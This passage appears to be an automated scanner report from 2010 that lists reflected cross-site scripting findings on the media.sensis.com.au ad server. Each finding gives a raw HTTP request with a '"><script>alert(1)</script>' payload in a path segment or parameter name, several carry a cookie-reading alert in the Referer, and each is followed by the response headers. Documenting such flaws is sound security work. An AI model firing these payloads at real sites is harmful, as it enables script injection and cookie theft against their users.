Request
GET /hserver/acc_random=469307811793/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?a11b5"><script>alert(1)</script>d321bb28ecc=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:37 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 520 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9ddb"><script>alert(1)</script>fcbe3980e99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserverb9ddb"><script>alert(1)</script>fcbe3980e99/acc_random=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=995784169955 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:52 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 2521 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6892"><script>alert(1)</script>b3b34b94df1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_randome6892"><script>alert(1)</script>b3b34b94df1=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=995784169955 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:53 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 467 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.616. http://media.sensis.com.au/hserver/acc_random=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=995784169955 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c7c1"><script>alert(1)</script>85b8afcd626 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=995784169955?4c7c1"><script>alert(1)</script>85b8afcd626=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:50 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 2542 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fa5c"><script>alert(1)</script>f790b9cd080 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver1fa5c"><script>alert(1)</script>f790b9cd080/acc_random=504449208892/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:29 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 507 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ff7c"><script>alert(1)</script>29794c8a740 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random2ff7c"><script>alert(1)</script>29794c8a740=504449208892/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:31 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 507 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.619. http://media.sensis.com.au/hserver/acc_random=504449208892/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92b29"><script>alert(1)</script>82e4153325d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=504449208892/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?92b29"><script>alert(1)</script>82e4153325d=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:28 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 510 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e5eb"><script>alert(1)</script>5094304b96d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver2e5eb"><script>alert(1)</script>5094304b96d/acc_random=575200071487/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:30 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 517 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a087b"><script>alert(1)</script>c4781fb498b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_randoma087b"><script>alert(1)</script>c4781fb498b=575200071487/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:31 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 517 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.622. http://media.sensis.com.au/hserver/acc_random=575200071487/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b68e3"><script>alert(1)</script>68426bb789e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=575200071487/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?b68e3"><script>alert(1)</script>68426bb789e=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:29 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 520 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe1f5"><script>alert(1)</script>ceca24be3b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserverfe1f5"><script>alert(1)</script>ceca24be3b3/acc_random=589225067973/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:41 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 433 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e425e"><script>alert(1)</script>8f9526a46d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_randome425e"><script>alert(1)</script>8f9526a46d4=589225067973/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:42 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 433 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.625. http://media.sensis.com.au/hserver/acc_random=589225067973/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ac0"><script>alert(1)</script>4fe2990056 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=589225067973/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?83ac0"><script>alert(1)</script>4fe2990056=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:38 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 435 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d6d0"><script>alert(1)</script>c600da87e50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver6d6d0"><script>alert(1)</script>c600da87e50/acc_random=593609499683/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=966541123782 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:52 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 467 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef01a"><script>alert(1)</script>63c52abf646 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_randomef01a"><script>alert(1)</script>63c52abf646=593609499683/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=966541123782 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:53 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 467 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.628. http://media.sensis.com.au/hserver/acc_random=593609499683/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=966541123782 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39391"><script>alert(1)</script>38547484e67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
